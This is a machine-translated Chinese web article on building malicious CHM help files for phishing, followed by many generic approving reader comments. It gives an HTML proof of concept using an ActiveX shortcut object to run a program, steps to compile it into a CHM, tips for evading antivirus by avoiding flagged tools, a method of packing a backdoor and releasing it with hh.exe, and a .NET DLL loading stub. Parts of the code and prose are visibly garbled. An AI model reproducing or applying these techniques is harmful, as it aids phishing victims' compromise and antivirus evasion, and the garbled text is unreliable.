大家好,今天来为大家解答黑客必须知道的CHM钓鱼操作你了解吗?这个问题的一些问题点,包括也一样很多人还不知道,因此呢,今天就来为大家分析分析,现在让我们一起来看看吧!如果解决了您的问题,还望您关注下本站哦,谢谢~
上面的总的意思就是可以忽悠更多的站长,社会工程学在这里发挥得淋漓尽致。
1)、使用com控制命令执行
根据Twitter 上的@ithurricanept
使用js启动com控件执行命令
原代码如下:
!DOCTYPE htmlhtmlheadtitleMousejack replay/titlehead/headbodycommand execOBJECT id=x classid=’clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11′ width=1 height=1PARAM name=’Command’ value=’ShortCut’ PARAM name=’Button’ value=’ Bitmap:shortcut’ PARAM name=’Item1′ value=’,calc.exe’ PARAM name=’Item2′ value=’273,1,1’/OBJECTSCRIPTx.Click();/SCRIPT/body/html
POC
使用HTML 帮助研讨会
新建项目,添加文件并编译
选择新的
请记住,不要选中此框
只需输入您想要的任何内容,并记住添加.hpp 后缀。
只需选择一个
然后选择new然后选择HTML文件
然后输入我们刚刚创建的poc
写入后ctrl+s保存
记住保存的地址
然后点击这个
选择“添加”以添加我们刚刚编写的文件。
然后点击确定
然后点击这个
获取参观地址。发现并执行订单
利用
实际测试时应注意以下几点:
执行命令时,请注意预定的参数和程序名需要用逗号替换,但参数之间不能用逗号替换。
考虑到执行敏感操作会导致防病毒提示,应避免使用powershell、bitsadmin、certutil、cscript等。
通过cmd执行命令也是一个敏感操作,所以使用多个控件依次执行命令。
在搜索过程中,我发现.chm文件的替换程序hh.exe有反编译功能(反编译,将chm返回html,其实和chm类似可以比作一个压缩包,反编译就是解压)功能,可以将打包成chm的文件释放
HH.EXE -decompile D:/xTemp/decompile-folder C:/xTemp/XMLconvert.chmhh -反编译目标文件夹源CHM文件名
这句话的意思
因此,可以将后门程序打包成chm文件,运行时调用hh.exe将chm中的后门程序释放出来然后执行。
测试:
使用360测试时,效果并不理想。如果在联网时使用hh.exe反编译,会被拦截,但断网时就没有问题了。
使用Tinder 进行测试没有显示任何拦截。
3、使用js加载.net
既然可以用chm执行js,为什么不嵌入.net和dll呢?
POC
编写.net dll
命名空间ClassLibrary1{ public class Class1 { public Class1() { /* 启动记事本*/Process.Start(‘notepad.exe’); } }}
原创文章,作者:小su,如若转载,请注明出处:https://www.sudun.com/ask/193730.html
用户评论
铁树不曾开花
钓鱼这东西确实很常见了,但要用软件操控真的很难理解。学习一下CHM操作也是挺有价值的,也许能提升自己的安全意识 haha~
有5位网友表示赞同!
抚笙
看完标题我以为是在讲钓鱼技巧,结果是黑客用的工具啊。这CHM啥意思?感觉还是太专业了,咱普通人看不明白
有19位网友表示赞同!
哥帅但不是蟋蟀
"黑客必会的" 说的也太夸张了吧,现在网络安全形势严峻,这种技术掌握在谁手里都有风险啊!
有15位网友表示赞同!
青衫故人
我曾经遇到过类似的钓鱼攻击,当时完全没察觉,幸好损失不严重。以后要更加警惕!CHM操作真是一个坑爹的技术…
有20位网友表示赞同!
如梦初醒
黑客的世界太复杂了,我看不懂这种技术细节,不过作为普通人还是应该提高安全意识,避免成为别人实验的对象吧。
有17位网友表示赞同!
别留遗憾
钓鱼攻击确实很常见,以前我朋友被骗走了几千块钱,当时可是惨痛的教训。希望更多人了解这种知识,才能更好地保护自己!
有11位网友表示赞同!
醉婉笙歌
CHM操作这个东西看起来有点吓人啊…如果黑客掌握了这种技术,后果可想而知。网络安全真是个严峻的问题!
有9位网友表示赞同!
◆残留德花瓣
学习安全性相关的知识是很有必要的,毕竟现在互联网上各种骗子充斥着 everywhere. 这种技術或许能帮助我们更好地保护自身信息安全。
有16位网友表示赞同!
寻鱼水之欢
我本身不是技术人员,但对网络安全问题还是很关心的。希望能够学到更多实用的知识和技巧,比如如何识别钓鱼网站、恶意软件等。CHM操作这个东西听起来就很有深度。
有14位网友表示赞同!
全网暗恋者
黑客的思维很敏捷,他们会想尽各种办法入侵系统,获取信息。CHM操作就是其中一种手段,可见网络安全问题确实需要我们重视起来!
有15位网友表示赞同!
早不爱了
我觉得这篇文章写的不错,深入浅出地介绍了CHM钓鱼操作的相关知识,同时也警示了我们加强网络安全意识的重要性。
有5位网友表示赞同!
该用户已上天
这种技术我倒是不想了解,因为涉及到的黑客行为实在太可怕了。希望这些技术不会落入不法之手,否则后果不堪设想!
有9位网友表示赞同!
身影
我觉得这篇文章很有深度,确实让我们对黑客的攻击手段有了更深入的认识。学习CHM操作虽然很困难,但也可以起到一定的警示作用。
有5位网友表示赞同!
秒淘你心窝
我一直认为网络安全是一个重要的议题,我们应该提高自身的安全意识,避免成为黑客的目标。这种CHM钓鱼操作的确让人感到不安,希望大家能学习识别这些陷阱!
有16位网友表示赞同!
迁心
文章内容很有价值,希望能有更多的人了解这些知识,从而更好地保护自己的个人信息和财产安全。
有10位网友表示赞同!
巷雨优美回忆
这个CHM钓鱼操作听起来很专业啊,我这种技术小白根本看不懂…不过我知道网络安全很重要,还是要尽力提高警惕!
有10位网友表示赞同!
呆檬
最近经常看到各种关于网络安全的新闻,感觉黑客的攻击手段越来越高明了。不得不佩服他们的技术水平,但也让人心生恐惧…
有18位网友表示赞同!
北朽暖栀
看完这篇文章我更加坚定信念,要学习更多网络安全知识,避免落入钓鱼陷阱!黑客的手段太邪恶了,我们必须提高警惕!
有12位网友表示赞同!
幸好是你
希望这样的文章能被更多人看到,警醒大家注意网络安全的风险!CHM钓鱼操作真是太可怕了,感觉自己离犯罪黑客的袭击只有一步之遥…
有7位网友表示赞同!